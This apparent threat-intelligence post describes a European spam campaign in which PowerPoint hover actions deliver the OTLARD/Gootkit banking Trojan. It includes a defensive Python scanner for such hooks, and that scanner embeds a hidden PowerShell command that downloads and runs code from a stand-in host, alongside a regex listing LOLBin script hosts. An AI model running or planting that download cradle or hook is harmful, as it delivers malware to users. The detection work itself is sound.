Mouse Over, Macro: Spam Run in Europe Uses Hover Action to Deliver Banking Trojan
While much of today's malware sports relatively new capabilities, most of its authors and operators still rely on old techniques to deliver it. Malicious macros and shortcut (LNK) files, for instance, are still used to distribute ransomware and banking Trojans and in targeted attacks. These methods are tried and tested, but we are also seeing distinctive or otherwise overlooked techniques, such as the abuse of legitimate tools like PowerShell, or malformed subtitle files used to remotely take over a device.
Recently, we found another unusual delivery method: abusing the action that PowerPoint fires when the mouse pointer simply hovers over a hyperlinked picture or text in a slideshow, with no click required. This technique is employed by a Trojan downloader (detected by Trend Micro as TROJ_POWHOV.A and P2KM_POWHOV.A) that we uncovered in a recent spam email campaign targeting the EMEA region, particularly organizations in the U.K., Poland, the Netherlands, and Sweden. Affected industries include manufacturing, device fabrication, education, logistics, and pyrotechnics.
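As an added example (not code from the original article or from Trend Micro's analysis), the following Python triage script unpacks a PowerPoint Open XML file and flags shapes that carry a mouseover or click hook which launches an external program. It assumes the standard ECMA-376 layout: slides under ppt/slides/, hyperlink targets resolved through each slide's .rels part, and the "run program" action encoded as action="ppaction://program" on an <a:hlinkMouseOver> or <a:hlinkClick> element. The deck it builds in memory is constructed for the demonstration and the embedded command line is a placeholder, not the campaign's.

```python
"""Triage scanner for PowerPoint mouseover/click action hooks.

Added example, not the article's or Trend Micro's code. Format assumptions
(Office Open XML, ECMA-376): a .pptx/.ppsx is a ZIP; each slide is
ppt/slides/slideN.xml; a hyperlink on a shape or text run is an <a:hlinkClick>
or <a:hlinkMouseOver> element whose r:id is resolved through
ppt/slides/_rels/slideN.xml.rels; "run a program" is action="ppaction://program".
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"
P_NS = "http://schemas.openxmlformats.org/presentationml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Script hosts and LOLBins commonly launched from a document hook; tune to your environment.
SUSPICIOUS_TARGET = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|certutil|bitsadmin|rundll32|regsvr32)\b",
    re.I)


def _load_rels(zf, slide_name):
    """Map rId -> (Target, TargetMode) for one slide's relationship part."""
    folder, _, base = slide_name.rpartition("/")
    rels_name = f"{folder}/_rels/{base}.rels"
    rels = {}
    if rels_name in zf.namelist():
        for rel in ET.fromstring(zf.read(rels_name)).iter(f"{{{PKG_NS}}}Relationship"):
            rels[rel.get("Id")] = (rel.get("Target"), rel.get("TargetMode"))
    return rels


def scan_presentation(data):
    """Return one finding per hyperlink hook found in the slides of the given file bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        slides = sorted(n for n in zf.namelist() if re.fullmatch(r"ppt/slides/slide\d+\.xml", n))
        for slide_name in slides:
            rels = _load_rels(zf, slide_name)
            root = ET.fromstring(zf.read(slide_name))
            for trigger in ("hlinkMouseOver", "hlinkClick"):
                for el in root.iter(f"{{{A_NS}}}{trigger}"):
                    action = el.get("action") or ""
                    target, mode = rels.get(el.get(f"{{{R_NS}}}id"), (None, None))
                    findings.append({
                        "slide": slide_name,
                        "trigger": trigger,  # hlinkMouseOver fires on hover alone, no click
                        "action": action,
                        "target": target,
                        "external": mode == "External",
                        # Flag a program launch, or a target that names a scripting host.
                        "suspicious": action.startswith("ppaction://program")
                                      or bool(target and SUSPICIOUS_TARGET.search(target)),
                    })
    return findings


def build_sample_pptx(trigger="hlinkMouseOver", action="ppaction://program",
                      target="powershell -nop -w hidden -c IEX((New-Object Net.WebClient)"
                             ".DownloadString('http://example.invalid/stage'))"):
    """Constructed minimal deck containing only the parts the scanner reads.
    The default command line is a placeholder, not the real campaign's."""
    action_attr = f' action="{action}"' if action else ""
    safe_target = escape(target, {'"': "&quot;"})
    slide_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:a="{A_NS}" xmlns:r="{R_NS}" xmlns:p="{P_NS}"><p:cSld><p:spTree>
<p:sp><p:nvSpPr><p:cNvPr id="2" name="TextBox 1"><a:{trigger} r:id="rId2"{action_attr}/></p:cNvPr>
<p:cNvSpPr txBox="1"/><p:nvPr/></p:nvSpPr><p:spPr/>
<p:txBody><a:bodyPr/><a:p><a:r><a:t>Hover here</a:t></a:r></a:p></p:txBody></p:sp>
</p:spTree></p:cSld></p:sld>"""
    rels_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{PKG_NS}">
<Relationship Id="rId2" Type="{R_NS}/hyperlink" Target="{safe_target}" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ppt/slides/slide1.xml", slide_xml)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_presentation(build_sample_pptx()):
        print(finding)
```

Run it over mail-gateway attachments rather than relying on extension filters: the hook is plain XML inside the ZIP, so the check works the same for .pptx, .ppsx and .ppsm, and including hlinkClick catches the same "run program" action wired to a click instead of a hover. Any external target with ppaction://program deserves a look even when the command line is not on the regex list.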
Malicious Mouseover Delivers OTLARD/Gootkit
The Trojan downloader we monitored and analyzed carried a variant of the OTLARD banking Trojan as its payload (TROJ_OTLARD.TY). OTLARD, also known as Gootkit, emerged as early as 2012 and soon evolved into an information-stealing Trojan with persistence, remote access, network traffic monitoring, and browser manipulation capabilities. OTLARD/Gootkit was notably used in a spam campaign in France in 2015, whose messages masqueraded as a letter from the French Ministry of Justice.
OTLARD/Gootkit is known for stealing credentials and bank account information in Europe. Its operators, who have relied on macro-laced documents to deliver their payloads, appear to have shifted tactics.
Our telemetry shows how short the spam run was: OTLARD-carrying spam emails spiked suddenly on May 25, peaking at 1,444 detections, fell to 782 detections by May 26, and died down on May 29. Spam campaigns are typically sent in such short bursts to stay under the radar of security vendors and law enforcement.